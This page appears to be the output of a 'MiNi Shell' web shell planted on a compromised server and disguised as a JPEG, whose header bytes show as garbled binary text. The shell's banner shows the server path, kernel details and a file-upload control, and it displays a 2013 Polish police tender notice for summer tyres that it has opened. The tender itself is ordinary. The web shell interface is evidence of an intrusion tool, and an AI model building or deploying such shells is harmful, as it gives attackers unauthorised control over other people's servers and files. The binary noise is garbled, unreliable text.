JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130410/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130410/53911-N-2013.html

<p class="kh_header"><b>Wrocław: dostawa opon letnich do samochodów osobowych, dostawczych i terenowych dla Komendy Wojewódzkiej, Komend Miejskich i Powiatowych Policji w garnizonie dolnośląskim.</b><br>
<b>Numer ogłoszenia: 53911 - 2013; data zamieszczenia: 10.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji we Wrocławiu , ul Podwale 31-33, 50-040 Wrocław, woj. dolnośląskie, tel. (071) 340 38 00, faks (071) 782 41 71.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.dolnoslaska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa opon letnich do samochodów osobowych, dostawczych i terenowych dla Komendy Wojewódzkiej, Komend Miejskich i Powiatowych Policji w garnizonie dolnośląskim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> dostawa opon letnich do samochodów osobowych, dostawczych i terenowych dla Komendy Wojewódzkiej, Komend Miejskich i Powiatowych Policji w garnizonie dolnośląskim; 

Część 1 postępowania - opony letnie, radialne, bezdętkowe dla pojazdów osobowych: 
Opony, wymienione w załączniku nr 1 do SIWZ formularz ofertowy, w części 1 postępowania, muszą spełniać wymagania postawione w Regulaminie EKG ONZ nr 30. Opony winny być zakwalifikowane w kategorii użycia jako opony, przeznaczone do użycia na drodze, szosie, wyłącznie w okresie występowania  temperatury  dodatniej.  Wszystkie opony są oponami radialnymi, bezdętkowymi.
UWAGA !!  nie  dopuszcza  się opon  błotno- śniegowych  oznaczonych  symbolem  M+S

Część 2 postępowania - opony  letnie, radialne, bezdętkowe dla  samochodów   dostawczych:
Opony, wymienione w załączniku nr 1 do SIWZ formularz ofertowy, w części 2 postępowania, muszą spełniać wymagania postawione w Regulaminie EKG ONZ nr 54. Opony winny być zakwalifikowane w kategorii użycia jako opony  przeznaczone do użycia na drodze, szosie wyłącznie w okresie występowania  temperatury  dodatniej. Wszystkie opony są oponami radialnymi, bezdętkowymi.
UWAGA !!  nie  dopuszcza  się opon  błotno- śniegowych  oznaczonych  symbolem  M+S

Część 3 postępowania - opony  letnie, radialne, bezdętkowe dla pojazdów terenowych:
Opony, wymienione w załączniku nr 1 do SIWZ, formularz ofertowy, w części 3 postępowania, winny być zakwalifikowane w kategorii użycia jako opony specjalnego użycia, tj. opony przeznaczone do użycia mieszanego, zarówno na drodze szosie oraz poza nią teren nieutwardzony. Wszystkie opony są oponami radialnymi, bezdętkowymi.
Opony  przeznaczone  do  użycia  w  okresach  występowania  temperatury  dodatniej.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.35.11.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymaga się wniesienia wadium w wysokości:  
W przypadku, gdy wykonawca składa ofertę na wszystkie części postępowania: 
5 900,00 zł
W przypadku, gdy wykonawca składa ofertę w części 1 postępowania: 3 500,00 zł
W przypadku, gdy wykonawca składa ofertę w części 2 postępowania: 1 800,00 zł
W przypadku, gdy wykonawca składa ofertę w części 3 postępowania:    600,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu  wykazania  spełniania  warunku  wiedzy  i  doświadczenia   przez  Wykonawcę   w postępowaniu;
      Zamawiający uzna warunek opisanego w Rozdziale VII SIWZ pkt 1.2 za spełniony, w odniesieniu do wykonawców, którzy wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, następujące  dostawy:

- dla części 1 postępowania: minimum 1 dostawę opon ( dostawa  realizowana  na  podstawie  jednej  umowy  na  rzecz  jednego  odbiorcy)  o wartości minimum 230 000,00 zł brutto, 
- dla części 2 postępowania: minimum 1 dostawę opon ( dostawa  realizowana  na  podstawie  jednej  umowy  na  rzecz  jednego  odbiorcy)  o wartości minimum 110 000,00 zł brutto, 
- dla części 3 postępowania: minimum 1 dostawę opon ( dostawa  realizowana  na  podstawie  jednej  umowy  na  rzecz  jednego  odbiorcy) o wartości minimum 40 000,00 zł brutto, 

z załączeniem dowodów  potwierdzających, że dostawy te zostały wykonane lub są wykonywane należycie. 
Uwaga !
W przypadku składania oferty;
 na więcej niż jedną część postępowania, zamawiający dopuszcza, aby wykonawca wykazał posiadanie wiedzy i doświadczenia w zakresie odpowiadającym sumie ilości i wartości dostaw, wymaganych dla każdej z części postępowania, opisanych powyżej 

lub wykazał zrealizowanie 1 dostawy, której wartość nie będzie mniejsza, niż suma minimalnych wymaganych wartości dostaw, wskazanych dla części zamówienia, opisanych powyżej

np. wykonawca, który składa ofertę na wszystkie części postępowania winien wykazać zrealizowanie: 1 dostawy opon na minimum: 230 000 zł brutto, 1 dostawy opon na minimum 110 000 zł brutto i 1 dostawy opon na minimum40 000 zł brutto 

lub wykazanie   zrealizowania 1 dostawy opon o wartości minimum 380 000 zł brutto   ( suma  wartości   wszystkich  3  części)  .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">zał  nr  8  -</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenia i dokumenty wymagane do załączenia w ofercie ,  niezbędne do przeprowadzenia postępowania.
Wypełniony i podpisany formularz ofertowy,  załącznik nr 1  do SIWZ
Oświadczenia i dokumenty     wymienione w Rozdziałach VI, VII i VIII SIWZ  tj.  załącznik nr 2 do SIWZ, załącznik nr 3 do SIWZ,  załącznik nr 4 do SIWZ  załącznik  do  SIWZ  nr  6, załącznik  nr  8  SIWZ .
W przypadku, gdy Wykonawca przewiduje udział podwykonawców w realizacji zamówienia,  oświadczenie dotyczące udziału podwykonawców, którego wzór określa załącznik nr 7 do SIWZ.
wadium  zgodnie  z  Rozdziałem  IV  SIWZ  
W przypadku wnoszenia oferty przez wspólników spółki cywilnej należy załączyć dodatkowo: 
w przypadku, gdy oferta nie jest podpisana przez wszystkich wspólników - pełnomocnictwo wspólników do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy podpisane przez wszystkich wspólników lub ich prawnie upoważnionych przedstawicieli. Pełnomocnictwo winno być przedstawione w formie oryginału bądź kopii poświadczonej za zgodność z oryginałem przez notariusza. 
W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia -konsorcjum 
Na podstawie art. 23 ust. 2 ustawy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
W związku z powyższym niezbędne jest przedłożenie w ofercie pełnomocnictwa ustanawiającego podmiot uprawniony , lidera,  do występowania w imieniu konsorcjum, wraz z określeniem zakresu umocowania lidera, pełnomocnictwo: do reprezentowania konsorcjum w prowadzonym postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. Wymaga się, by pełnomocnictwo było podpisane przez prawnie upoważnionych przedstawicieli każdego z partnerów, konsorcjantów. Pełnomocnictwo winno być przedstawione w formie oryginału bądź kopii poświadczonej za zgodność z oryginałem przez notariusza. 
Każdy z partnerów musi złożyć oświadczenie,  załącznik  nr 2 że nie podlega wykluczeniu z postępowania. Wszystkie warunki udziału w postępowaniu, o których mowa w Rozdziale VII pkt 1 partnerzy winni spełniać łącznie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b></p>
<p>przeprowadzona będzie aukcja elektroniczna:</b> tak, adres strony, na której będzie prowadzona: https://aukcje.uzp.gov.pl</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dolnoslaska.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego (Komenda Wojewódzka Policji we Wrocławiu   Wrocław  50-040, 
Punkt Obsługi Klienta: wejście od ul. Podwale 31 - 33 ).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.04.2013 godzina 10:00, miejsce: w siedzibie Zamawiającego (Komenda Wojewódzka Policji we Wrocławiu   Wrocław  50-040, 
Punkt Obsługi Klienta: wejście od ul. Podwale 31 - 33 ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com